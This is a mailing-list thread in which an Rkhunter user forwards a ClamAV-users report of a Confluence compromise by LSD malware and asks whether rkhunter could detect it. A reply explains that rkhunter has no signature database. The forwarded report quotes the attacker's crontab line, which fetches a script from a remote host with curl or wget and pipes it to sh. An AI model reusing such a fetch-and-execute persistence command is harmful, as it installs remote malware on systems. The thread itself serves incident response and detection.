I'm sure it could be added eventually, but Rkhunter doesn't use a database of signatures for situations like this. Each search is hard coded into the main process, with many months between releases. About the best that could be done would be to patch the developer version so that you could use it in advance of release, if and when they have time to write the patch.
Software like ClamAV is much more agile and can turn out updates to their signature database in a day or so.

Sent from my iPad
-Al-

On Apr 25, 2019, at 05:18, Brent Clark wrote:

> Good day Guys
>
> I just came across the following on the ClamAV mailing list.
>
> Is this not something that can be added to rkhunter's signature / database?
>
> Regards
> Brent Clark
>
>
> -------- Forwarded Message --------
> Subject: [clamav-users] LSD Malwares
> Date: Thu, 25 Apr 2019 14:52:05 +0530
> From: Xavier Maysonnave via clamav-users <clamav-us...@lists.clamav.net>
> Reply-To: ClamAV users ML <clamav-us...@lists.clamav.net>
> To: clamav-us...@lists.clamav.net
> CC: Xavier Maysonnave <x.maysonn...@gmail.com>
>
>
> Dear Friends,
>
> We recently faced an Atlassian Confluence issue.
> Atlassian issued a security advisory on 29/03/2019
> <https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>.
> Following this thread
> <https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
> we understood what happened on our server.
> Confluence is running in its own user space and has seen its crontab hacked.
>
> On our Debian Stretch, 'crontab -u confluence -e' shows a non-legit
> instruction:
>
> */10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh
>
>
> Obviously the security flaw in Confluence opened the gate to this behaviour.
> As we are running Confluence in its own user space, the i.jpg which contains
> the shell script didn't harm our server. No malware has been deployed;
> however, the server was shutting down immediately after starting.
>
> We cleaned up the crontab and upgraded Confluence to avoid any further
> infection.
>
> However, we need to check our installation and I'm wondering if ClamAV already
> knows this malware family
> <https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
> I already opened a report with ClamAV. Is there any user who faced this issue,
> and is ClamAV ready to detect and clean up our Linux boxes?
>
> Any pointers to any information about this LSD Malware family will be
> greatly appreciated as I try to evaluate the risks for our infrastructure (I
> checked various DBs with no success and googled too).
>
> Warmly.
>
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>

_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users